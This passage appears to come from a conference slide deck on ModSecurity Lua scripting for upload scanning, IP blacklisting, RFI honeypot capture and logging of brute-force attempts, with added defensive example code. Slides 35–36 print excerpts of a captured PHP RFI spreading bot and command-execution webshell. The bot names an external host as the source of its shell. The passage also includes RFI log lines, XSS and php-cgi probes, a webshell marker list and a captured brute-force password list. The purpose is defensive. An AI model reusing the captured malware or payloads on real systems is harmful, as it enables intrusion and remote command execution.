    The .htaccess file must be writable by the web server user, which is itself a risk to weigh.
  • 21. Using @inspectFile
      SecRule FILES_TMPNAMES "@inspectFile file_inspector.lua" deny
    FILES_TMPNAMES holds the temporary paths of the files in a multipart upload; @inspectFile hands each path to the script.
  • 22. Example script (AV)
      SecRule FILES_TMPNAMES "@inspectFile file_inspector.lua" deny

      --- file_inspector.lua ---
      -- @inspectFile passes the upload's temp path to main(). Returning a string
      -- means "match" (it becomes the log message); returning nil means clean.
      function main(filename)
        local fh = io.open(filename, "r")
        if not fh then return nil end
        for line in fh:lines() do            -- assignment is not an expression in Lua, so no while(line = ...)
          if string.find(line, "MALICIOUS", 1, true) then   -- plain substring match
            fh:close()
            return "MALICIOUS marker found in upload"
          end
        end
        fh:close()
        return nil
      end
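A fuller version of the inspector above, added here as an example and not taken from the talk or its GitHub repo: it scans for several PHP webshell markers rather than one literal, reads the upload in binary chunks so a large file is not slurped into memory, follows ModSecurity's contract for @inspectFile scripts (return a string to match, nil to pass) and carries a small harness that only runs outside ModSecurity, where the global `m` table does not exist. The marker list, the /etc/modsecurity path in the comment and the fail-open choice for an unreadable temp file are assumptions to tune.

```lua
-- webshell_inspector.lua
-- Wire it up with:
--   SecRule FILES_TMPNAMES "@inspectFile /etc/modsecurity/webshell_inspector.lua" deny
-- ModSecurity passes the upload's temp path to main(). A returned string is a
-- match (it becomes the rule's log message); nil means the file is clean.

-- Assumed marker list: plain substrings (not Lua patterns), already lower-case
-- because the buffer is lower-cased before searching. Tune for your application.
local MARKERS = {
  "<?php",
  "eval(",
  "base64_decode(",
  "shell_exec(",
  "passthru(",
  "$_cookie[",
}

local CHUNK   = 64 * 1024  -- read 64 KiB at a time
local OVERLAP = 32         -- carry a tail between chunks so a marker split across them is still seen

-- Returns the matched marker or nil; a second return value carries an I/O error.
local function scan(filename)
  local fh = io.open(filename, "rb")   -- binary mode: uploads are not necessarily text
  if not fh then
    return nil, "cannot open " .. tostring(filename)
  end
  local tail = ""
  while true do
    local chunk = fh:read(CHUNK)
    if not chunk then break end
    local lower = (tail .. chunk):lower()   -- <?PHP and <?php are the same to the interpreter
    for _, marker in ipairs(MARKERS) do
      if lower:find(marker, 1, true) then   -- plain find: '(' '.' '$' stay literal
        fh:close()
        return marker
      end
    end
    tail = lower:sub(-OVERLAP)
  end
  fh:close()
  return nil
end

function main(filename)
  local hit, err = scan(filename)
  if err then
    -- Assumed policy: an unreadable temp file is a server problem, not evidence
    -- of attack, so log it and let the request through. Return a string here
    -- instead if you would rather fail closed.
    if m then m.log(4, "webshell_inspector: " .. err) end
    return nil
  end
  if hit then
    return "webshell marker '" .. hit .. "' found in uploaded file"
  end
  return nil
end

-- Stand-alone harness: ModSecurity defines the global table `m`, so this only
-- runs when the script is executed directly with a plain lua interpreter.
if m == nil then
  local path = os.tmpname()
  local f = assert(io.open(path, "wb"))
  f:write("GIF89a\n<?PHP eval($_COOKIE['e']); ?>")   -- constructed: image header, PHP body
  f:close()
  print(main(path))
  f = assert(io.open(path, "wb"))
  f:write("just a plain text file\n")
  f:close()
  print(main(path))
  os.remove(path)
end
```

Run it with `lua webshell_inspector.lua` to see the first constructed upload reported and the second pass; under ModSecurity only main() is called.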
  • 26. SpiderLabs making it awesome
    - Implemented their own AV detection using ClamAV
    - It's in the SpiderLabs github
    - https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/runav.pl
  • 27. Matching With Scripts
      SecRuleScript "check_blacklist.lua" deny
  • 28. Matching With Scripts
      SecRuleScript "check_blacklist.lua" deny

      --- check_blacklist.lua ---
      -- With SecRuleScript the script is the operator: a returned string is a match, nil is not.
      function main()
        local ip = m.getvar("REMOTE_ADDR")
        for line in io.lines("blacklist.txt") do   -- one address per line; use an absolute path in practice
          if line == ip then                        -- exact compare: string.match(ip, line) would treat "."
            return "blacklisted client " .. ip     -- as a wildcard and a blank line as match-everything
          end
        end
        return nil
      end
  • 29. Matching With Scripts
      SecRule REQUEST_URI "admin" deny,chain
        SecRuleScript "check_blacklist.lua"
    The disruptive action sits on the first rule of the chain; the script only runs when the URI rule matched, so the blacklist file is read only for admin requests.
  • 30. SpiderLabs making it awesome #2
    @ipMatchFromFile implemented in release 2.7
      SecRule REQUEST_URI "admin" deny,chain
        SecRule REMOTE_ADDR "@ipMatchFromFile blacklist.txt"
    The operator needs a variable to test (REMOTE_ADDR); the file takes one IP address or CIDR range per line and is parsed when the configuration is loaded.
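A SecRuleScript blacklist that understands CIDR ranges and re-reads its file on every request, written for this page as an added example (it is neither the speaker's check_blacklist.lua nor the built-in @ipMatchFromFile): it shows the per-request file read that makes runtime appends take effect immediately, and does the prefix match with arithmetic because Lua 5.1 has no bit operators. The path /etc/modsecurity/blacklist.txt and the entries in the harness are assumptions.

```lua
-- cidr_blacklist.lua
-- Wire it up with:
--   SecRuleScript "/etc/modsecurity/cidr_blacklist.lua" "deny,status:200"
-- A SecRuleScript is the operator: main() returning a string is a match (the
-- string is logged), returning nil is not.

-- Assumed path. One entry per line: "203.0.113.7" or "203.0.113.0/24";
-- blank lines and "# comments" are ignored. IPv4 only.
local BLACKLIST_FILE = "/etc/modsecurity/blacklist.txt"

-- Dotted quad -> 32-bit number, or nil if the text is not an IPv4 address.
local function ipv4_to_int(s)
  local a, b, c, d = s:match("^(%d+)%.(%d+)%.(%d+)%.(%d+)$")
  if not a then return nil end
  a, b, c, d = tonumber(a), tonumber(b), tonumber(c), tonumber(d)
  if a > 255 or b > 255 or c > 255 or d > 255 then return nil end
  return ((a * 256 + b) * 256 + c) * 256 + d
end

local function int_to_ipv4(n)
  local d = n % 256; n = math.floor(n / 256)
  local c = n % 256; n = math.floor(n / 256)
  local b = n % 256; n = math.floor(n / 256)
  return string.format("%d.%d.%d.%d", n, b, c, d)
end

-- "1.2.3.4" or "1.2.3.0/24" -> { net = <int>, bits = <prefix length> }, nil if unusable.
function parse_entry(line)
  line = line:gsub("#.*$", ""):gsub("^%s+", ""):gsub("%s+$", "")
  if line == "" then return nil end
  local ip, bits = line:match("^([%d%.]+)/(%d+)$")
  if not ip then ip, bits = line, "32" end     -- a bare address is a /32
  local n = ipv4_to_int(ip)
  bits = tonumber(bits)
  if not n or not bits or bits > 32 then return nil end
  return { net = n, bits = bits }
end

-- Prefix match without bit operators: dividing by 2^host_bits and flooring
-- discards the host part of both addresses.
local function in_network(addr, entry)
  local block = 2 ^ (32 - entry.bits)
  return math.floor(addr / block) == math.floor(entry.net / block)
end

function load_blacklist(path)
  local entries = {}
  local fh = io.open(path, "r")
  if not fh then return entries end          -- missing file: nothing is blacklisted
  for line in fh:lines() do
    local e = parse_entry(line)
    if e then entries[#entries + 1] = e end
  end
  fh:close()
  return entries
end

-- Returns the match message or nil. Non-IPv4 clients (IPv6, garbage) never match.
function check(ip, entries)
  local addr = ipv4_to_int(ip or "")
  if not addr then return nil end
  for _, e in ipairs(entries) do
    if in_network(addr, e) then
      return string.format("client %s is blacklisted (%s/%d)", ip, int_to_ipv4(e.net), e.bits)
    end
  end
  return nil
end

function main()
  -- Read the file on every request so entries appended at runtime (for example
  -- by an exec script) take effect immediately, unlike @ipMatchFromFile, which
  -- parses its file when the configuration loads. Cache if traffic is high.
  return check(m.getvar("REMOTE_ADDR"), load_blacklist(BLACKLIST_FILE))
end

-- Stand-alone harness with a constructed blacklist; ModSecurity defines `m`,
-- so this block is skipped there.
if m == nil then
  local entries = {}
  for _, line in ipairs({ "192.168.69.0/24   # lab scanner range", "10.0.0.7", "", "garbage/99" }) do
    local e = parse_entry(line)
    if e then entries[#entries + 1] = e end
  end
  print(check("192.168.69.101", entries))
  print(check("10.0.0.7", entries))
  print(check("10.0.0.8", entries))
  print(check("2001:db8::1", entries))
end
```

The harness exercises a range hit, an exact hit, a near miss and a non-IPv4 client; the malformed "garbage/99" line is silently dropped by parse_entry rather than turning into a match-everything entry.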
  • 31. Counter Intelligence
  • 32. RFI Hunting
    192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    Trivial to pull from logs while the included URL sits in the query string.
  • 33. RFI Hunting
    192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    Problem ... the access log never sees the POST body, so the included URL is gone. The WAF, which does inspect the body, can capture it.
  • 34. rfi_logger.lua
      SecRule ARGS "^https?://" allow,exec:rfi_logger.lua

      --- rfi_logger.lua ---
      -- Quote a value for the shell: the URL is attacker-controlled, and passing it
      -- unquoted to os.execute would let a ' or ; in the parameter run commands.
      local function shell_quote(s)
        return "'" .. (s:gsub("'", "'\\''")) .. "'"
      end

      function main()
        local ip = m.getvar("REMOTE_ADDR")
        local url = m.getvar("REQUEST_URI")
        local args = m.getvars("ARGS")
        for j = 1, #args do
          if string.match(args[j].value, "^https?://") then
            local fh = io.open("/tmp/backdoor", "a")
            if fh then
              fh:write("---" .. ip .. " " .. url .. " " .. args[j].name .. "=" .. args[j].value .. "---\n")
              fh:close()
            end
            -- -q quiet, -x keep the remote directory structure, -P output prefix
            os.execute("wget -q -x -P /tmp/rfi_files/ " .. shell_quote(args[j].value))
          end
        end
      end

    allow lets the request through to the application, so this is a honeypot rather than a block; the server also fetches whatever URL the attacker names, so run it on an isolated host, give wget a --timeout, and keep /tmp/rfi_files/ outside the web root.
  • 35. It works
      <?php
      ###[ SEMBON CrEw SPREAD for RFIBot (2.3) ]###
      error_reporting(0);
      ##### CONFIG #####
      $mode = $_GET["mode"];
      $url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path
      $src = $url.'cmd'; //Source Shell
      $shell = '404.php'; //Backdoor PHPShell name
      $bot = $url.'bot'; //Source PHPBot
      ##### SPREAD #####
      ...
      die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal! (Indonesian: "encode so it's more optimal!")
      }
      ...
  • 36. It works
      <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
      <H1>Changing this CMD will result in corrupt scanning !</H1>
      </html></head></body>
      <?php
      ...
      function ex($cfe){
        $res = '';
        if (!empty($cfe)){
          if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
          } elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
          }
      ...
  • 37. Better than a blacklist
    Malicious Request -> WAF script: 1) Capture Request 2) Log IP
  • 38. Better than a blacklist
    Unknown Host -> Request -> WAF script -> Unobstructed Response
    Malicious Host -> Request -> WAF script: 1) Capture Request 2) Log All Data -> Unobstructed Response
  • 39. Put it together
      SecRule REQUEST_HEADERS:User-Agent "<?php" deny,status:200,exec:blacklist_ip.lua
      SecRule REMOTE_ADDR "@ipMatchFromFile blacklist.txt" deny,status:200,exec:uber_logger.lua
    status:200 makes the denial look like an ordinary response, so the attacker does not learn they were spotted.
  • 40. Put it together
      SecRule REQUEST_HEADERS:User-Agent "<?php" deny,status:200,exec:blacklist_ip.lua

      --- blacklist_ip.lua ---
      function main()
        local ip = m.getvar("REMOTE_ADDR")
        local fh = io.open("blacklist.txt", "a")   -- relative to the server's working directory; prefer an absolute path
        if fh then
          fh:write(ip .. "\n")
          fh:close()
        end
      end

    Caveat: @ipMatchFromFile parses its file when the configuration is loaded, so addresses appended here are only enforced after a reload; the SecRuleScript version of check_blacklist.lua, which reads the file on every request, picks them up immediately.
  • 41. Put it together
      SecRule REMOTE_ADDR "@ipMatchFromFile blacklist.txt" deny,status:200,exec:uber_logger.lua

      --- uber_logger.lua ---
      function main()
        local ip = m.getvar("REMOTE_ADDR")
        local url = m.getvar("REQUEST_URI")
        local args = m.getvars("ARGS")
        local headers = m.getvars("REQUEST_HEADERS")
        local logstring = ""
        for j = 1, #headers do
          logstring = logstring .. " " .. headers[j].name .. "=" .. headers[j].value
        end
        for j = 1, #args do
          logstring = logstring .. " " .. args[j].name .. "=" .. args[j].value
        end
        local fh = io.open("/tmp/uberlog", "a")
        if fh then
          fh:write(ip .. " " .. url .. logstring .. "\n")
          fh:close()
        end
      end
  • 42. Put it together
    Uberlog data:
      69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script>
      69.110.217.76 /index.php?-s REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
    (Nmap's http scripts: a reflected XSS probe, then the php-cgi "?-s" argument-injection probe.)
  • 43. Data Mining
    Capture only on malicious requests. Log far more data:
    - REQUEST_HEADERS
    - POST variables
    - COOKIE data
    - FILES uploaded in the request
    - GeoIP information
    - Live data on the attack
    - Make pretty* graphs
    * OK they are not that pretty
  • 47. The WordPress Incident (Monitoring Brute Force Attacks)
    "Massive" WordPress attack in early April 2013. Reported by several hosting providers as the reason for outages. A Mr. Brian K. blogged that it was a botnet recruiting run.
    Coincidentally: I had been monitoring wp-login.php requests with full data for months.
  • 48. The WordPress Incident (Why was I logging?)
    Someone* complained on twitter**. Their logs looked like this:
      POST wp-login.php
      POST wp-login.php
      POST wp-login.php
      POST wp-login.php
      POST wp-login.php
    They wanted to know more.
    * it was @Viss
    ** First time ever that complaining on twitter was beneficial, but not to the complainer.
  • 49. The WordPress Incident (Script I re-used)
    I decided to put the uber_logger.lua script to work.
      SecRule REQUEST_URI wp-login.php allow,exec:uber_logger.lua
    The credentials travel in the POST body, so SecRequestBodyAccess On is needed for ARGS to contain log and pwd (the rule runs in phase 2 by default). Note also that allow ends rule processing for the request, so nothing else will block wp-login.php traffic while this rule is in place.
  • 50. The WordPress Incident (Script I re-used)
      x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin
      x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins
      x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster
      x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password
      x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111
      x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
  • 51. The WordPress Incident (Data I got)
    - Password list of the brute force
    - Frequency of attacks against sites I controlled
    Passwords: naruto, pokemon, 123456, admin, Sitename123, etc...
    Correlated with the data from other researchers.
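The uber_logger records above (slides 41, 42 and 50) are space-separated name=value pairs, so a parameter value that contains a space, an "=" or a newline (a URL-encoded %0a decodes to one before it reaches ARGS) can split or forge a record before anyone mines it. What follows is an added example, not code from the talk: a logger that percent-encodes every field so one request is always exactly one line, the matching decoder, and the frequency count that produces a password list like the one on slide 51. The harness at the bottom runs only outside ModSecurity and feeds constructed sample requests; the /tmp/uberlog path is kept from the slide, and the record layout is this example's own.

```lua
-- uber_logger2.lua: a hardened take on the uber_logger idea.
--   SecRule REQUEST_URI wp-login.php allow,exec:/etc/modsecurity/uber_logger2.lua

-- Percent-encode everything except unreserved characters plus '/' and ':' (kept
-- for readability), so a value can never contain a space, '=' or newline.
local function encode(s)
  return (tostring(s):gsub("[^%w%-%._~/:]", function(c)
    return string.format("%%%02X", string.byte(c))
  end))
end

local function decode(s)
  return (s:gsub("%%(%x%x)", function(h) return string.char(tonumber(h, 16)) end))
end

-- One record: "<ip> <uri> name=value name=value ...".
-- `vars` is a list of { name = ..., value = ... } tables, as m.getvars() returns.
function format_record(ip, uri, vars)
  local parts = { encode(ip), encode(uri) }
  for _, v in ipairs(vars) do
    parts[#parts + 1] = encode(v.name) .. "=" .. encode(v.value)
  end
  return table.concat(parts, " ")
end

-- Inverse of format_record: { ip = ..., uri = ..., fields = { name = value } }.
function parse_record(line)
  local rec = { fields = {} }
  local i = 0
  for tok in line:gmatch("%S+") do
    i = i + 1
    if i == 1 then
      rec.ip = decode(tok)
    elseif i == 2 then
      rec.uri = decode(tok)
    else
      local name, value = tok:match("^([^=]*)=(.*)$")   -- the only raw '=' is the separator
      if name then rec.fields[decode(name)] = decode(value) end
    end
  end
  return rec
end

-- How often each value of `field` appears across the records, e.g. "ARGS:pwd".
function frequency(lines, field)
  local counts = {}
  for _, line in ipairs(lines) do
    local v = parse_record(line).fields[field]
    if v then counts[v] = (counts[v] or 0) + 1 end
  end
  return counts
end

-- Entry point ModSecurity calls for exec:. Headers first, then ARGS, as on slide 41.
function main()
  local vars = {}
  for _, v in ipairs(m.getvars("REQUEST_HEADERS") or {}) do vars[#vars + 1] = v end
  for _, v in ipairs(m.getvars("ARGS") or {}) do vars[#vars + 1] = v end
  local fh = io.open("/tmp/uberlog", "a")
  if fh then
    fh:write(format_record(m.getvar("REMOTE_ADDR"), m.getvar("REQUEST_URI"), vars), "\n")
    fh:close()
  end
end

-- Stand-alone harness (ModSecurity defines `m`, so it is skipped there) with
-- constructed requests standing in for m.getvars() output.
if m == nil then
  local attempts = {
    { "203.0.113.236", "/wp-login.php", { { name = "ARGS:log", value = "admin" }, { name = "ARGS:pwd", value = "naruto" } } },
    { "203.0.113.236", "/wp-login.php", { { name = "ARGS:log", value = "admin" }, { name = "ARGS:pwd", value = "123456" } } },
    { "203.0.113.99",  "/wp-login.php", { { name = "ARGS:log", value = "admin" }, { name = "ARGS:pwd", value = "naruto" } } },
    -- This value would have forged a second record in the space-separated format:
    { "203.0.113.99",  "/wp-login.php", { { name = "ARGS:log", value = "admin" },
                                          { name = "ARGS:pwd", value = "x\n198.51.100.1 /wp-login.php ARGS:pwd=fake" } } },
  }
  local lines = {}
  for _, a in ipairs(attempts) do lines[#lines + 1] = format_record(a[1], a[2], a[3]) end
  for _, l in ipairs(lines) do print(l) end
  for pwd, n in pairs(frequency(lines, "ARGS:pwd")) do print(n, pwd) end
end
```

The fourth constructed attempt stays a single line with its newline and spaces encoded, and the count for "ARGS:pwd" sees three real passwords rather than four, which is the difference between data you can mine and data an attacker has edited for you.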
  • 52. The WordPress Incident (My Perspective)
    - It was a brute force, but a lame one.
    - It got press because hosts were going down.
    - Evidence that WP auth mechanisms can cause DoS.
    - WordPress is a buzzword for security press.
    - Read my article all about WP auth on blog.spiderlabs.com :).
  • 54. Bibliography/Questions?
    - http://www.modsecurity.org
    - http://www.lua.org
    - http://blog.spiderlabs.com
    SpiderLabs github: https://github.com/SpiderLabs
    You seriously want my code? https://github.com/rawrly/ModSecScripts
    Take your pitchfork to me on twitter: @iamlei